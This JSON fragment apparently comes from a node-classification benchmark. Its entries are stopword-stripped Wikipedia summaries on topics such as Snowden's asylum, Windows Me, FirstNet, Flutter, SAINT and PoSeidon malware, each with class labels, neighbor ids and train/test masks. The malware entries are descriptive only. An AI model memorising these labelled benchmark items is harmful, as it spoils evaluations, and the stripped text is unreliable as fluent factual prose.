leaving stateless person without judicial order administration seeks stop exercising basic right right belongs everybody right seek asylum four countries offered snowden permanent asylum ecuador nicaragua bolivia venezuela direct flights moscow venezuela bolivia nicaragua existed however u.s. pressured countries along route hand snowden said july 2013 decided bid asylum russia felt safe way reach latin america snowden said remained russia talking possibilities asylum latin america united states forced bolivian president plane citing morales plane incident issue said governments western european north american states demonstrated willingness act outside law behavior persists today unlawful threat makes impossible travel latin america enjoy asylum granted accordance shared rights said would travel russia interference u.s. government four months snowden received asylum russia julian assange commented venezuela ecuador could protect short term long term could change government russia safe well-regarded likely change advice snowden would physically safest russia according snowden cia powerful presence latin america governments security services relatively much less capable say russia ... could basically snatched ... october 2014 interview nation magazine snowden reiterated originally intended travel latin america lot people still unaware never intended end russia according snowden u.s. government waited departed hong kong cancel passport order trap russia snowden added really wanted capture would 've allowed travel latin america cia operate impunity want chose keep russia july 1 2013 president evo morales bolivia attending conference russia suggested interview russia today would consider request snowden asylum following day morales plane en route bolivia rerouted austria landed france spain italy denied access airspace plane parked vienna spanish ambassador austria arrived two embassy personnel asked search plane denied permission morales u.s. officials raised suspicions snowden may board morales blamed u.s. putting pressure european countries said grounding plane violation international law april 2015 bolivia ambassador russia maría luisa ramos urzagaste accused julian assange inadvertently putting morales life risk intentionally providing u.s. false rumors snowden morales plane assange responded n't expecting outcome result caused united states intervention regret happened snowden applied political asylum 21 countries statement attributed contended u.s. administration specifically vice president joe biden pressured governments refuse asylum petitions biden telephoned president rafael correa days prior snowden remarks asking ecuadorian leader grant snowden asylum ecuador initially offered snowden temporary travel document later withdrew correa later called offer mistake july 1 statement published wikileaks snowden accused u.s. government using citizenship weapon using described old bad tools political aggression citing obama promise allow wheeling dealing case snowden commented kind deception world leader justice neither extralegal penalty exile several days later wikileaks announced snowden applied asylum six additional countries declined name alleging attempted u.s. interference evaluating law snowden situation french interior ministry rejected request asylum poland refused process application conform legal procedure brazil foreign ministry said government planned response snowden asylum request germany india rejected snowden application outright austria ecuador finland norway italy netherlands spain said must territory apply november 2014 germany announced snowden renewed previously denied request considered asylum glenn greenwald later reported sigmar gabriel vice-chancellor germany told u.s. government threatened stop sharing intelligence germany offered snowden asylum arranged travel putin said july 1 2013 snowden wanted granted asylum russia would required stop work aimed harming american partners spokesman putin subsequently said snowden withdrawn asylum application upon learning conditions july 12 meeting sheremetyevo airport representatives human rights organizations lawyers organized part russian government snowden said accepting offers asylum already received would receive added venezuela grant asylum formalized asylee status removing basis state interference right asylum also said would request asylum russia resolved travel problems russian federal migration service officials confirmed july 16 snowden submitted application temporary asylum july 24 kucherena said client wanted find work russia travel create life already begun learning russian amid media reports early july 2013 attributed u.s. administration sources obama one-on-one meeting putin ahead g20 meeting st petersburg scheduled september doubt due snowden protracted sojourn russia top u.s. officials repeatedly made clear moscow snowden immediately returned united states face charges unauthorized leaking classified information russian lawyer said snowden needed asylum faced persecution u.s. government feared could subjected torture capital punishment letter russian minister justice aleksandr konovalov dated july 23 u.s. attorney general eric holder repudiated snowden claim refugee status offered limited validity passport good direct return u.s asserted snowden would subject torture death penalty would receive trial civilian court proper legal counsel day russian president spokesman reiterated government would hand snowden noting putin personally involved matter handled talks fbi russia fsb june 14 2013 united states federal prosecutors filed criminal complaint snowden charging theft government property two counts violating espionage act 1917 unauthorized communication national defense information willful communication classified communications intelligence information unauthorized person three charges carries maximum possible prison term ten years charge initially secret unsealed week later snowden asked january 2014 interview returning u.s. face charges court obama suggested days prior snowden explained rejected request n't say crimes charged crimes n't allow make case n't allow defend open court public convince jury benefit ... would say illustrative president would choose say someone face music knows music show trial snowden legal representative jesselyn radack wrote espionage act effectively hinders person defending jury open court said arcane world war law never meant prosecute whistleblowers rather spies betrayed trust selling secrets enemies profit non-profit betrayals considered june 23 2013 snowden landed moscow sheremetyevo airport aboard commercial aeroflot flight hong kong august 1 39 days transit section left airport granted temporary asylum russia one year year later temporary asylum expired snowden received three-year residency permit allowing travel freely within russia go abroad three months granted permanent political asylum january 2017 spokesperson russian foreign ministry wrote facebook snowden asylum due expire 2017 extended couple years snowden lawyer anatoly kucherena said extension valid 2020 subject controversy snowden variously called hero whistleblower dissident patriot traitor pentagon papers leaker daniel ellsberg called snowden release nsa material significant leak u.s. history numerous high-ranking current former u.s. government officials reacted publicly snowden disclosures u.s. snowden actions precipitated intense debate privacy warrantless domestic surveillance president obama initially dismissive snowden saying 'm going scrambling jets get 29-year-old hacker august 2013 obama rejected suggestion snowden patriot november said benefit debate generated worth damage done another way june 2013 u.s senator bernie sanders vermont wrote blog love hate owe snowden thanks forcing upon nation important debate debate n't gnawing questions actions raised shadows snowden said december 2013 inspired global debate ignited leaks nsa culture indiscriminate global espionage ... collapsing end 2013 however washington post noted public debate offshoots produced meaningful change policy status quo continuing 2016 axe files podcast former u.s. attorney general eric holder said snowden performed public service raising debate engaged changes made holder nevertheless said snowden actions inappropriate illegal september 2016 bipartisan u.s. house permanent select committee intelligence completed review snowden disclosures said federal government would spend millions dollars responding fallout snowden disclosures report also said public narrative popularized snowden allies rife falsehoods exaggerations crucial omissions report denounced washington post reporter barton gellman called aggressively dishonest contemptuous fact august 2013 president obama said called review u.s. surveillance activities snowden begun revealing details nsa operations announced directing dni james clapper establish review group intelligence communications technologies december task force issued 46 recommendations adopted would subject nsa additional scrutiny courts congress president would strip nsa authority infiltrate american computer systems using backdoors hardware software panel member geoffrey r. stone said evidence bulk collection phone data stopped terror attacks june 6 2013 wake snowden leaks conservative public interest lawyer judicial watch founder larry klayman filed lawsuit claiming federal government unlawfully collected metadata telephone calls harassing klayman v. obama judge richard j. leon referred nsa almost-orwellian technology ruled bulk telephone metadata program probably unconstitutional snowden later described judge leon decision vindication june 11 aclu filed lawsuit james clapper director national intelligence alleging nsa phone records program unconstitutional december 2013 ten days judge leon ruling judge william h. pauley iii came opposite conclusion aclu v. clapper although acknowledging privacy concerns trivial pauley found potential benefits surveillance outweigh considerations ruled nsa collection phone data legal gary schmitt former staff director senate select committee intelligence wrote two decisions generated public confusion constitutionality nsa data collection program—a kind judicial 'he-said she-said standoff may 7 2015 case aclu v. clapper united states court appeals second circuit said section 215 patriot act authorize nsa collect americans calling records bulk exposed snowden 2013 decision voided u.s. district judge william pauley december 2013 finding nsa program lawful remanded case review appeals court rule constitutionality bulk surveillance declined enjoin program noting pending expiration relevant parts patriot act circuit judge gerard e. lynch wrote given national security interests stake prudent give congress opportunity debate decide matter june 2 2015 u.s. senate passed president obama signed usa freedom act restored modified form several provisions patriot act expired day first time imposing limits bulk collection telecommunication data u.s. citizens american intelligence agencies new restrictions widely seen stemming snowden revelations hans-georg maaßen head federal office protection constitution germany domestic security agency said snowden could working russian government snowden rejected insinuation crediting snowden leaks united nations general assembly unanimously adopted resolution 68/167 december 2013 non-binding resolution denounced unwarranted digital surveillance included symbolic declaration right individuals online privacy support snowden came latin american leaders including argentinian president cristina fernández de kirchner brazilian president dilma rousseff ecuadorian president rafael correa bolivian president evo morales venezuelan president nicolás maduro nicaraguan president daniel ortega official report published october 2015 united nations special rapporteur promotion protection right freedom speech professor david kaye criticized u.s. government harsh treatment bringing criminal charges whistleblowers including edward snowden report found snowden revelations important people everywhere made deep lasting impact law policy politics european parliament invited snowden make pre-recorded video appearance aid nsa investigation snowden gave written testimony said seeking asylum eu told european parliamentarians u.s. would allow eu partners make offer told parliament nsa working security agencies eu states get access much data eu citizens possible nsa foreign affairs division claimed lobbies eu countries change laws allowing everyone country spied legally july 2014 navi pillay un high commissioner human rights told news conference geneva u.s. abandon efforts prosecute snowden since leaks public interest surveys conducted news outlets professional polling organizations found american public opinion divided snowden disclosures polled canada europe supportive snowden respondents u.s. although americans grown supportive snowden disclosure global surveillance disclosures snowden honored publications organizations based europe united states voted guardian person year 2013 garnering four times number votes candidate march 2014 snowden spoke south southwest sxsw interactive technology conference austin texas front 3,500 attendees participated teleconference carried multiple routers running google hangouts platform on-stage moderators christopher soghoian snowden legal counsel wizner aclu snowden said nsa setting fire future internet sxsw audience firefighters attendees could use twitter send questions snowden answered one saying information gathered corporations much less dangerous gathered government agency governments power deprive rights representative mike pompeo r-ks house intelligence committee later director cia tried unsuccessfully get sxsw management cancel snowden appearance instead sxsw director hugh forrest said nsa welcome respond snowden 2015 conference later month snowden appeared teleconference ted conference vancouver british columbia represented stage robot video screen video camera microphones speakers snowden conversed ted curator chris anderson told attendees online businesses act quickly encrypt websites described nsa prism program u.s. government using businesses collect data nsa intentionally misleads corporate partners using example bullrun decryption program create backdoor access snowden said would gladly return u.s. given immunity prosecution concerned alerting public abuses government authority anderson invited internet pioneer tim berners-lee stage converse snowden said would support berners-lee concept internet magna carta encode values structure internet september 15 2014 snowden appeared via remote video link along julian assange kim dotcom moment truth town hall meeting held auckland made similar video link appearance february 2 2015 along greenwald keynote speaker world affairs conference upper canada college toronto march 2015 speaking fifdh international human rights film festival made public appeal switzerland grant asylum saying would like return live geneva worked undercover central intelligence agency november 10 2015 snowden appeared newseum via remote video link pen american center secret sources whistleblowers national security free expression event 2015 snowden earned 200,000 digital speaking engagements u.s. march 19 2016 snowden delivered opening keynote address libreplanet conference meeting international free software activists developers presented free software foundation conference held massachusetts institute technology first time snowden spoke via teleconference using full free software stack end-to-end july 21 2016 snowden hardware hacker bunnie huang talk mit media lab forbidden research event published research smartphone case so-called introspection engine would monitor signals received sent phone provide alert user phone transmitting receiving information n't example turned airplane mode feature described snowden useful journalists activists operating hostile governments would otherwise track activities phones july 2013 media critic jay rosen defined snowden effect direct indirect gains public knowledge cascade events reporting followed edward snowden leaks classified information surveillance state u.s. december 2013 nation wrote snowden sparked overdue debate national security individual privacy forbes effect seen nearly united u.s. congress opposition massive post-9/11 domestic intelligence gathering system spring 2014 global attitudes survey pew research center found snowden disclosures tarnished image united states especially europe latin america november 2 2018 snowden provided court declaration jewel v. national security agency snowden impact public figure felt cinema advertising video games literature music statuary social media",
    "neighbors": [
      2050,
      4623,
      3088,
      9233,
      4118,
      8726,
      9240,
      10775,
      6170,
      7199,
      4133,
      11302,
      3629,
      8750,
      3637,
      4163,
      5699,
      9285,
      4168,
      2634,
      7759,
      8784,
      4689,
      10831,
      600,
      91,
      10341,
      107,
      10859,
      5229,
      10867,
      5749,
      3703,
      1143,
      1169,
      3730,
      1683,
      4250,
      9375,
      161,
      8356,
      1189,
      6312,
      9901,
      9395,
      180,
      3252,
      10935,
      6344,
      7887,
      208,
      7893,
      2779,
      7899,
      4319,
      1251,
      3299,
      743,
      3305,
      7411,
      3843,
      1299,
      11046,
      297,
      8519,
      4937,
      6474,
      4940,
      4436,
      9558,
      2906,
      7515,
      4956,
      1381,
      5479,
      3944,
      8567,
      1400,
      6017,
      10119,
      1928,
      2953,
      1930,
      11659,
      2958,
      1946,
      2973,
      1440,
      4001,
      8104,
      8106,
      10154,
      959,
      3520,
      1986,
      10697,
      7119,
      8664,
      9688,
      8156,
      4595,
      6644,
      4086,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3496,
    "label": 2,
    "text": "Windows_Me:windows windows millennium edition windows marketed pronunciation pronoun codenamed millennium graphical operating system developed microsoft part windows 9x family operating systems successor windows 98 released manufacturing june 19 2000 general availability september 14 2000 windows last operating system released windows 9x series targeted specifically home pc users included internet explorer 5.5 windows media player 7 new windows movie maker software provided basic video editing designed easy use home users microsoft also updated graphical user interface shell features windows explorer first introduced windows 2000 released business-oriented operating system seven months earlier windows could upgraded internet explorer 6 sp1 sp2 sv1 internet explorer 7 outlook express 6 sp1 windows media player 9 series microsoft .net framework including version 2.0 supported however versions 2.0 sp1 3.x greater office xp last version microsoft office compatible windows windows continuation windows 9x model still dos-based like predecessors restricted access real mode ms-dos order decrease system boot time october 2001 windows xp released became windows successor popularizing features introducing visual themes including reliable windows nt kernel 1998 microsoft stated would version windows 9x windows 98 may 1999 however microsoft released windows 98 second edition announced new version windows 9x later revealed codenamed millennium 2000 released windows millennium edition windows least three beta versions windows available development phase september 24 1999 microsoft announced windows millennium beta 1 released windows millennium beta 2 released november 24 1999 added couple new features system file protection game options control panel several interim builds released beta 1 2 added features automatic updates personalized menus beta 3 released april 11 2000 version marked first appearance final version startup shutdown sounds derived windows 2000 previous betas used windows 98 startup shutdown sounds final version boot screen first featured pre-beta 3 build 2470 general availability date windows millennium edition september 14 2000 launch time microsoft announced time-limited promotion september 2000 – january 2001 entitled windows 95 windows 98 users upgrade windows 59.95 instead regular retail upgrade price 109 shortly windows released manufacturing june 19 2000 microsoft launched campaign-initiative promote windows u.s. dubbed meet tour national partnered promotional program featured windows oems partners interactive multimedia attraction 25 cities across u.s launched september 14 2000 compared releases windows windows short shelf-life year microsoft aimed make first consumer windows os based nt kernel however happen windows rushed market neptune project canceled windows along windows 2000 eventually succeded nt-based windows xp launched august 24 2001 windows featured shell enhancements inherited windows 2000 personalized menus customizable windows explorer toolbars auto-complete windows explorer address bar run box windows 2000 advanced file type association features displaying comments shortcuts tooltips extensible columns details view icolumnprovider interface icon overlays integrated search pane windows explorer sort name function menus places bar common dialogs open save cascading start menu special folders plus 95 plus 98 themes updated graphics notification area windows later supported 16-bit high color icons multimedia control panel also updated windows 98 se taskbar start menu options allowed disabling drag drop feature could prevent moving resizing taskbar easier new users windows restricted support real mode ms-dos result codice_5 windows disregards codice_1 codice_21 codice_22 directly executes codice_23 default configuration system would neither boot ms-dos command prompt exit dos windows real mode drivers codice_24 could loaded older applications require real mode could run microsoft argued change improved speed reliability boot process windows codice_1 codice_2 files used set global environment variables two files present scanned settings relating environment variables commands present removed windows registry key see two files thus contain settings preferences configure global environment computer boot phase starting new virtual dos machine vdm specify edit startup values windows 98 would present codice_2 file user must edit following windows registry key troubleshooting crash recovery windows cd-rom windows startup disk user-createable floppy disk known emergency boot disk ebd allowed booting real mode ms-dos possible restore real mode dos functionality various unofficial means additionally registry setting exists re-enables restart ms-dos mode option shutdown dialog box unlike past versions windows 9x windows entirely aimed home users thus certain enterprise-oriented features removed several features predecessors work officially unsupported microsoft windows including automated installation active directory client services system policy editor personal web server asp features supported predecessors windows 98 windows 95 resource kit publication targeted towards system administrators never published windows features removed never updated work windows included microsoft fax quickview drivespace well gui fat32 conversion tool several windows explorer commands removed windows windows heavily panned many users critics mainly due stability issues due many bugs glitches windows considered one worst operating systems time pc world article dubbed windows mistake edition placed 4th worst tech products time feature 2006 article states shortly appeared late 2000 users reported problems installing getting run getting work hardware software getting stop running byron hinson julien jay writing activewin took appreciative look operating system removal real mode dos noted removal dos clearly made difference windows terms stability far less blue screens death seen booting speed greatly increased recommendation operating system upgrade users windows 95 98 stated windows n't revolutionary os clear microsoft focused efforts make user-friendly stable packed full multimedia options result great enhancements added really worth wait along windows 2000 nt family windows last version windows lacked product activation system restore suffered bug date-stamping functionality could cause system restore date-stamp snapshots taken 8 september 2001 incorrectly could prevent system restore locating snapshots cause system restore process fail microsoft released update fix problem one common errors startup shutdown computer would display blue screen death instead starting shutting well logo graphic failing load boot microsoft planned stop support windows december 31 2004 however order give customers time migrate newer windows versions particularly developing emerging markets microsoft decided maintain support july 11 2006 support windows 98 also ended date microsoft ended support products company considers obsolete running products expose users security risks 2011 microsoft removed update website windows updates site windows 98 windows 98 se also terminated year windows also contained microsoft java virtual machine caused well windows 98 windows 98 se pulled microsoft developer network end 2003 windows designed handle 512 mb ram default systems larger ram pools may lose stability however depending hardware software configuration sometimes possible manually tweak installation continue working somewhat larger amounts ram well systems 1.5 gb ram may reboot continuously startup windows windows spellings used referring operating system windows used microsoft pc world",
    "neighbors": [
      6148,
      6150,
      10257,
      1043,
      11283,
      537,
      9757,
      3109,
      11301,
      6697,
      1581,
      7739,
      582,
      1098,
      4174,
      8281,
      9819,
      8798,
      10338,
      8296,
      5225,
      8299,
      7796,
      6265,
      8315,
      636,
      9340,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      1186,
      7847,
      5293,
      9902,
      10414,
      3250,
      9910,
      1741,
      10957,
      5840,
      214,
      3289,
      4316,
      224,
      736,
      4321,
      9448,
      10989,
      242,
      5363,
      6393,
      2811,
      4870,
      8976,
      3857,
      5401,
      292,
      6441,
      7983,
      3890,
      9525,
      7483,
      6462,
      7486,
      321,
      11605,
      2391,
      10079,
      11103,
      7523,
      2919,
      6506,
      2943,
      1408,
      8576,
      8578,
      10623,
      10624,
      3463,
      6028,
      8080,
      10130,
      5526,
      4505,
      929,
      4515,
      6062,
      11184,
      7603,
      440,
      3514,
      6078,
      7615,
      7106,
      7108,
      8132,
      9166,
      8659,
      9173,
      5080,
      5600,
      8161,
      4074,
      1515,
      5103,
      3573,
      10229
    ],
    "mask": "Train"
  },
  {
    "node_id": 3497,
    "label": 3,
    "text": "First_Responder_Network_Authority:first responder network authority first responder network authority firstnet united states created middle class tax relief job creation act 2012 mctrjca independent authority within national telecommunications information administration ntia purpose firstnet establish operate maintain interoperable public safety broadband network fulfill objectives congress allotted 7 billion 20 mhz valuable radio spectrum build network first responder network authority board directors team 15 experts firstnet board established part middle class tax relief job creation act 2012 representatives include secretary homeland security attorney general director office management budget permanent members remaining members selected secretary commerce public safety technical network and/or financial expertise construction nationwide firstnet network requires state radio access network ran connect firstnet network core according mctrjca firstnet responsible consulting states local communities tribal governments develop requirements ran deployment plan efforts began may 2013 however state option either allow firstnet create ran opt create ran even state chooses opt receives approval federal communications commission fcc develop ran ran must use firstnet network core must meet firstnet requirements state receive fcc approval must demonstrate following abilities states meet criteria receive fcc approval may apply grant funding ntia calls nationwide broadband system came september 11 2001 federal government working toward system ever since time 9/11 attacks highlighted inability deployed public safety networks handle true crisis situation firstnet early stages creating first nationwide high-speed broadband wireless network providing single interoperable platform law enforcement firefighters paramedics public safety officials every state county locality tribal area. ” april 2016 article spokesman firstnet said “ firstnet going really revolutionize communications technology first responders next-generation technology ’ going save lives ’ going keep first responders safer make communities safer ’ going provide extra situational awareness people field. ” currently around 10,000 different incompatible “ land mobile radio networks first responders u.s. use jobs patchwork different systems get way first responders able effectively communicate emergencies states able opt firstnet new nationwide broadband network firstnet assists states providing guide helps states deploy communications networks interoperability systems federal communications commission national telecommunications information administration also involved coordinating broadband system u.s. senate hearing july 2016 senators brian schatz d-hawaii roger wicker r-mississippi expressed concern firstnet ceo testifying hearing various issues related national broadband system schatz said would rather see firstnet partner states instead establishing 'grantee-grantor relationship wicker said concerned 7 billion budget program enough funding august 2016 firstnet held border security forum phoenix arizona firstnet officials met federal local security officials discuss problems communications networks updates firstnet deployment national broadband wireless network firstnet representatives said lte technology data apps people smart phones help emergency responders public emergencies firstnet headquartered reston virginia technical headquarters boulder colorado authority board created public-private partnership march 2017 build firstnet december 2017 50 states opted network plan questions remained would deployed cost-effective firstnet characterized wasteful post-9/11 initiative journalist steven brill",
    "neighbors": [
      9048,
      10858
    ],
    "mask": "Test"
  },
  {
    "node_id": 3498,
    "label": 5,
    "text": "BumperCar:bumpercar bumpercar mac os x web browser freeverse software aimed towards kids bumpercar contains extensive parental controls including filtering personal information blocking whitelists blacklists time limits full support icra tags version 2 based webkit well technologies omni group",
    "neighbors": [
      576,
      7983,
      487
    ],
    "mask": "Test"
  },
  {
    "node_id": 3499,
    "label": 2,
    "text": "Flutter_(software):flutter software flutter open-source mobile application development framework created google used develop applications android ios well primary method creating applications google fuchsia first version flutter known codename sky ran android operating system unveiled 2015 dart developer summit stated intent able render consistently 120 frames per second keynote google developer days shanghai google announced flutter release preview 2 last big release flutter 1.0 december 4th 2018 flutter 1.0 released flutter live event denoting first stable version framework major components flutter include flutter apps written dart language make use many language advanced features android windows macos linux via semi-official flutter desktop embedding project flutter runs dart virtual machine features just-in-time execution engine due app store restrictions dynamic code execution flutter apps use ahead-of-time aot compilation ios notable feature dart platform support hot reload modifications source files injected running application flutter extends support stateful hot reload cases changes source code reflected immediately running app without requiring restart loss state feature implemented flutter received widespread praise flutter engine written primarily c++ provides low-level rendering support using google skia graphics library additionally interfaces platform-specific sdks provided android ios flutter engine portable runtime hosting flutter applications implements flutter core libraries including animation graphics file network i/o accessibility support plugin architecture dart runtime compile toolchain developers interact flutter via flutter framework provides modern reactive framework rich set platform layout foundation widgets foundation library written dart provides basic classes functions used construct applications using flutter apis communicate engine ui design flutter typically involves assembling and/or creating various widgets widget flutter represents immutable description part user interface graphics including text shapes animations created using widgets complex widgets created combining many simpler ones however use widgets strictly required build flutter apps alternative option use foundation library methods directly interfacing canvas commands draw shapes text imagery directly screen property flutter utilized frameworks open-source flame game engine flutter framework contains two sets widgets conform specific design languages material design widgets implement google design language name cupertino widgets imitate apple ios design",
    "neighbors": [
      4096,
      1409,
      4995,
      5892,
      8455,
      7816,
      9610,
      6797,
      5262,
      8719,
      3600,
      6800,
      5522,
      1427,
      5524,
      7700,
      10645,
      11408,
      10009,
      8858,
      1435,
      9244,
      10393,
      798,
      10525,
      288,
      7841,
      2978,
      8609,
      4901,
      1959,
      7595,
      10284,
      3633,
      1203,
      823,
      5431,
      2875,
      10045,
      7359,
      196,
      3269,
      3782,
      11590,
      11592,
      4683,
      4044,
      10445,
      9039,
      3664,
      3409,
      4048,
      3795,
      11343,
      11221,
      1240,
      7548,
      8285,
      8413,
      6367,
      9949,
      2658,
      9063,
      6632,
      5483,
      236,
      5100,
      5612,
      9712,
      9970,
      8821,
      7926,
      3836,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3500,
    "label": 4,
    "text": "WatchGuard:watchguard watchguard formally known watchguard technologies inc seattle washington-based network security vendor products designed protect computer networks outside threats malware ransomware company founded 1996 watchguard founded 1996 seattle software labs inc. first product network firewall called watchguard security management system included watchguard firebox firewall box security appliance along configuration administration software 1997 company changed name watchguard technologies inc july 1999 company went public nasdaq october 2006 company acquired 151 million private equity firms francisco partners vector capital bruce coleman brought interim ceo august 2007 joe wang became company permanent ceo replacing coleman may 2014 ceo wang stepped replaced interim ceo michael kohlsdorf operating partner francisco partners april 2015 kohlsdorf succeeded ceo prakash panjwani announced panjwani kohlsdorf joining watchguard board june 2016 company acquired hawkeye g threat-detection response technology hexis cyber solutions sensage part keyw holding corp october company launched watchguard wi-fi cloud extend network security wi-fi networks august 2017 watchguard acquired datablink provider multi-factor authentication software used secure laptops servers devices january 2018 company acquired percipient networks domain name system service provider july 2018 company announced application called authpoint designed provide multi-factor authentication security businesses company develops security products services businesses three product groups network security secure wi-fi multi-factor authentication network security devices categorized unified threat management utm whereby single device provides multiple security features devices include watchguard dimension network discovery tool allows administrators identify devices network including mobile devices watchguard cloud giving devices access online threat intelligence wi-fi product line consists secure indoor outdoor wave 1 wave 2 802.11ac wi-fi hardware security subscription services watchguard wi-fi cloud management platform used control devices multi-factor authentication group includes company authpoint application multi-factor authentication management reporting tool prevents unauthorized users accessing sensitive cloud applications vpns networks company also issues quarterly security report based feed data watchguard utm appliances installed customer sites report highlights type frequency malicious attacks occurring computer networks",
    "neighbors": [
      6560,
      8998,
      939,
      11244,
      3885,
      3732,
      8343,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3501,
    "label": 1,
    "text": "Orange_(database_management_and_monitoring_software):orange database management monitoring software orange database management monitoring tool manufactured warevalley orange first released december 2001",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3502,
    "label": 7,
    "text": "Open_Cloud_Computing_Interface:open cloud computing interface open cloud computing interface occi set specifications delivered open grid forum cloud computing service providers occi set implementations act proofs concept builds upon world wide web fundamentals using representational state transfer rest approach interacting services aim open cloud computing interface development open specification api cloud offerings focus infrastructure-as-a-service iaas based offerings interface extended support platform software service offerings well iaas one three primary segments cloud computing industry compute storage network resources provided services api based review existing service-provider functionality set use cases contributed working group occi boundary api acts service front-end iaas provider ’ internal infrastructure management framework occi provides commonly understood semantics syntax means management domain consumer-to-provider iaas covers management entire life-cycle occi-defined model entities compatible existing standards open virtualization format ovf cloud data management interface cdmi notably serves integration point standardization efforts including distributed management task force internet engineering task force storage networking industry association occi began march 2009 initially led sun microsystems rabbitmq complutense university madrid today working group 250 members includes numerous individuals industry academic parties occi operates umbrella open grid forum ogf using wiki mailing list collaboration implement specific extensions occi particular service iaas paas brokering etc several implementations announced released frameworks build occi apis complementing variety developer tools alternative approaches include use cloud infrastructure management interface cimi related standards set dmtf amazon web services interfaces amazon latter endorsed known standards organization opennebula conducted survey users results showed 38 expose cloud apis users interface sunstone gui 36 mostly use amazon web services api 26 mostly use opennebula ’ occi api occi api offered rocci",
    "neighbors": [
      9665,
      4194,
      4429,
      1262,
      7248,
      119,
      1079,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 3503,
    "label": 4,
    "text": "SAINT_(software):saint software saint security administrator ’ integrated network tool computer software used scanning computer networks security vulnerabilities exploiting found vulnerabilities saint scanner screens every live system network tcp udp services service finds running launches set probes designed detect anything could allow attacker gain unauthorized access create denial-of-service gain sensitive information network saint provides support security content automation protocol scap specification unauthenticated vulnerability scanner authenticated vulnerability patch scanner saint also approved scanning vendor payment card industry pci four steps saint scan saint group vulnerabilities according severity type count also provide information particular host group hosts saint describes vulnerabilities locates references common vulnerabilities exposures cve cert advisories iava information assurance vulnerability alerts describes ways correct vulnerabilities many cases saint scanner provides links patches new software versions eliminate detected vulnerabilities vulnerability flaw system device application leveraged attacker could impact security system exploits take advantage vulnerability compromising destructing vulnerable system device application remediation process repairing providing remedy vulnerability thereby eliminating risk exploited vulnerability scanning used identify evaluate security posture network historically scanners developed specific purposes scanning windows desktops applications network devices saint offers heterogeneous scanning identifies vulnerabilities across operating systems desktop applications network devices web applications databases integrated penetration testing tool saintexploit demonstrates path attacker could use breach network quantifies risk network saintexploit includes web site emulator e-mail forgery tool penetration testing tools saint designed simulate internal external real-world attacks type testing identifies methods gaining access target understanding techniques used attackers many levels types penetration testing scope project well defined targets included scope could include popular protocols network devices databases web applications desktop applications various flavors operating systems saint focuses development exploits shell established shell shellcode exploits included offer command shell/direct connection target computer performing testing exploits target operating systems desktop applications databases web applications protocols network devices common exploit types included saintexploit include following • remote exploit – attacks launched across internet network vulnerable target without user previous access system • client exploit – victim must access attacker ’ resource successful attack take place common client exploits include e-mail forgery attacks enticing user visit web site open file • local exploit – order launch local attack attacker must previous access victim also known privilege elevation tunneling case victim machine used launch pad connecting vulnerable targets saint ’ remote management console saintmanager enables enterprise-wide vulnerability scanning browser-based console provides ability centrally manage entire network saint vulnerability scanners single interface saintcloud enables cloud based vulnerability scanning penetration testing compliance audits without download install software saint security administrator integrated network tool network vulnerability scanner based satan security administrator tool analyzing networks developed dan farmer wietse venema released 1995 saint corporation formerly world wide digital security inc. wwdsi continued development released saint july 1998 wwdsi changed name saint corporation january 2002 saint products developed saint corporation headquartered bethesda maryland",
    "neighbors": [
      3172,
      5636,
      635,
      2409,
      10924,
      4081,
      2739,
      2709,
      4373,
      8791,
      11413,
      2747,
      7228
    ],
    "mask": "Test"
  },
  {
    "node_id": 3504,
    "label": 0,
    "text": "Classic_monolingual_word-sense_disambiguation:classic monolingual word-sense disambiguation classic monolingual word sense disambiguation evaluation tasks uses wordnet sense inventory largely based supervised semi-supervised classification manually sense annotated corpora first senseval workshop hector sense inventory adopted reason adopting previously unknown sense inventory mainly avoid use popular fine-grained word senses wordnet could make experiments unfair biased however given lack coverage inventories since second senseval workshop wordnet sense inventory adopted wsd exercises require dictionary specify word senses disambiguated corpus language data disambiguated wordnet popular example sense inventory reason adopting hector database senseval-1 wordnet inventory already publicly available comparison methods divided 2 groups amount words test difference consists amount analysis processing assumed former one realistic evaluation although laborious testing results initially latter used evaluation later former included lexical sample organizers choose samples systems tested criticism earlier forays lexical-sample wsd evaluation lexical sample chosen according whim experimenter coincide earlier experimenters selections english senseval sampling frame devised words classified according frequency bnc polysemy level wordnet also inclusion pos-tagging problem matter discussion decided samples words known part speech indeterminants ex 15 noun tasks 13 verb tasks 8 adjectives 5 indeterminates comparison purposes known yet simple algorithms named baselines used include different variants lesk algorithm frequent sense algorithm evaluation wsd systems two main performance measures used system makes assignment every word precision recall called accuracy model extended take account systems return set senses weights occurrence",
    "neighbors": [
      416,
      3385,
      538,
      5781
    ],
    "mask": "None"
  },
  {
    "node_id": 3505,
    "label": 4,
    "text": "PoSeidon_(malware):poseidon malware poseidon name family malicious computer programs targeting computerized point-of-sale systems cisco talos computer security research laboratory discovered introduced family malware nickname poseidon security blog 20 march 2015 malware attempts steal keystrokes credit card numbers stored system memory scanning ram discover visa mastercard amex issued credit cards credit card data encrypted sent exfiltrated number predefined russian servers commercial remote administration software logmein installed logmein settings modified forcing next remote user enter username password allows username password read keylogger exfiltrated",
    "neighbors": [
      8978,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 3506,
    "label": 4,
    "text": "YARA:yara yara name tool primarily used malware research detection provides rule-based approach create descriptions malware families based textual binary patterns description essentially yara rule name rules consist sets strings boolean expression language used traits perl compatible regular expressions yara originally developed victor alvarez virustotal name either abbreviation yara yet another recursive acronym yet another ridiculous acronym yara default comes modules process pe elf analysis well support open-source cuckoo sandbox",
    "neighbors": [
      7809,
      8582,
      4972,
      11221,
      5337,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 3507,
    "label": 1,
    "text": "Visual_Expert:visual expert visual expert static program analyzer extracting design technical information software source code reverse-engineering used programmers software maintenance modernization optimization designed parse several programming languages time pl/sql transact-sql powerbuilder ... analyze cross-language dependencies addition language source code visual expert used several contexts",
    "neighbors": [
      1856,
      10340,
      2222,
      7983,
      1459,
      5749,
      11030,
      5399,
      10173
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3508,
    "label": 4,
